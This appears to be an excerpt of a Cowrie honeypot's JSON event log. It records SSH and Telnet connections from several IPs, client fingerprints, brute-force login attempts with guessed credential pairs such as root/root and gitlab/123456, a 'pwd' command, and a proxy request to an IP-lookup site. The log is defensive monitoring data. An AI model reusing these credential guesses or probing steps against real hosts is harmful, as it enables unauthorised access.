{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:37:55.053680Z","src_ip":"171.243.151.203","session":"7e2ab3a0591d"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T00:37:57.437375Z","src_ip":"212.227.235.229","session":"2740a19b71d7"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:37:57.439413Z","src_ip":"212.227.235.229","session":"2740a19b71d7"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-28T00:37:59.567496Z","src_ip":"171.243.151.203","session":"7e2ab3a0591d"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:38:02.888589Z","src_ip":"171.243.151.203","session":"7e2ab3a0591d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62675,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bedb7a90fb3","protocol":"ssh","message":"New connection: 212.227.235.229:62675 (1.2.3.4:22) [session: 9bedb7a90fb3]","sensor":"my-vps","timestamp":"2025-08-28T00:38:06.693223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:38:07.046796Z","src_ip":"212.227.235.229","session":"9bedb7a90fb3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:38:07.047730Z","src_ip":"212.227.235.229","session":"9bedb7a90fb3"}
{"eventid":"cowrie.login.success","username":"root","password":"0683895675Arthur","message":"login attempt [root/0683895675Arthur] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:38:10.060374Z","src_ip":"212.227.235.229","session":"9bedb7a90fb3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T00:38:11.489316Z","src_ip":"212.227.235.229","session":"9bedb7a90fb3"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T00:38:11.490003Z","src_ip":"212.227.235.229","session":"9bedb7a90fb3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:38:12.155012Z","src_ip":"212.227.235.229","session":"9bedb7a90fb3"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:38:12.490717Z","src_ip":"212.227.235.229","session":"9bedb7a90fb3"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:38:13.998331Z","src_ip":"212.227.235.229","session":"d7d89181a40d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36847,"dst_ip":"1.2.3.4","dst_port":23,"session":"1d03dde777d1","protocol":"telnet","message":"New connection: 212.227.235.229:36847 (1.2.3.4:23) [session: 1d03dde777d1]","sensor":"my-vps","timestamp":"2025-08-28T00:38:24.124931Z"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":35584,"dst_ip":"1.2.3.4","dst_port":22,"session":"60464ce1f0d2","protocol":"ssh","message":"New connection: 171.243.150.245:35584 (1.2.3.4:22) [session: 60464ce1f0d2]","sensor":"my-vps","timestamp":"2025-08-28T00:38:34.770087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:38:34.778672Z","src_ip":"171.243.150.245","session":"60464ce1f0d2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:38:34.978912Z","src_ip":"171.243.150.245","session":"60464ce1f0d2"}
{"eventid":"cowrie.login.success","username":"root","password":"@","message":"login attempt [root/@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:38:36.684346Z","src_ip":"171.243.150.245","session":"60464ce1f0d2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"171.243.150.245","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T00:38:38.345237Z","session":"60464ce1f0d2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T00:38:38.611315Z","src_ip":"171.243.150.245","session":"60464ce1f0d2"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:38:38.830137Z","src_ip":"171.243.150.245","session":"60464ce1f0d2"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":46426,"dst_ip":"1.2.3.4","dst_port":22,"session":"8130c9d2ffb0","protocol":"ssh","message":"New connection: 194.233.79.134:46426 (1.2.3.4:22) [session: 8130c9d2ffb0]","sensor":"my-vps","timestamp":"2025-08-28T00:38:50.256909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:38:51.030744Z","src_ip":"194.233.79.134","session":"8130c9d2ffb0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:38:51.031738Z","src_ip":"194.233.79.134","session":"8130c9d2ffb0"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T00:38:52.382002Z","src_ip":"194.233.79.134","session":"8130c9d2ffb0"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:38:54.019245Z","src_ip":"194.233.79.134","session":"8130c9d2ffb0"}
{"eventid":"cowrie.session.closed","duration":30.804193258285522,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:38:54.929066Z","src_ip":"212.227.235.229","session":"1d03dde777d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42176,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf136156dfc2","protocol":"ssh","message":"New connection: 212.227.125.160:42176 (1.2.3.4:22) [session: cf136156dfc2]","sensor":"my-vps","timestamp":"2025-08-28T00:38:55.080971Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:38:55.086519Z","src_ip":"212.227.125.160","session":"cf136156dfc2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:38:55.334560Z","src_ip":"212.227.125.160","session":"cf136156dfc2"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T00:38:57.067777Z","src_ip":"212.227.125.160","session":"cf136156dfc2"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:38:58.354360Z","src_ip":"212.227.125.160","session":"cf136156dfc2"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":40984,"dst_ip":"1.2.3.4","dst_port":22,"session":"47f662f0f16e","protocol":"ssh","message":"New connection: 171.243.150.245:40984 (1.2.3.4:22) [session: 47f662f0f16e]","sensor":"my-vps","timestamp":"2025-08-28T00:38:59.275916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:38:59.305700Z","src_ip":"171.243.150.245","session":"47f662f0f16e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:38:59.594976Z","src_ip":"171.243.150.245","session":"47f662f0f16e"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T00:39:01.575747Z","src_ip":"171.243.150.245","session":"47f662f0f16e"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:39:07.374353Z","src_ip":"171.243.150.245","session":"47f662f0f16e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":9904,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d368d3e3d0f","protocol":"ssh","message":"New connection: 212.227.235.229:9904 (1.2.3.4:22) [session: 8d368d3e3d0f]","sensor":"my-vps","timestamp":"2025-08-28T00:39:09.370732Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T00:39:09.371872Z","src_ip":"212.227.235.229","session":"8d368d3e3d0f"}
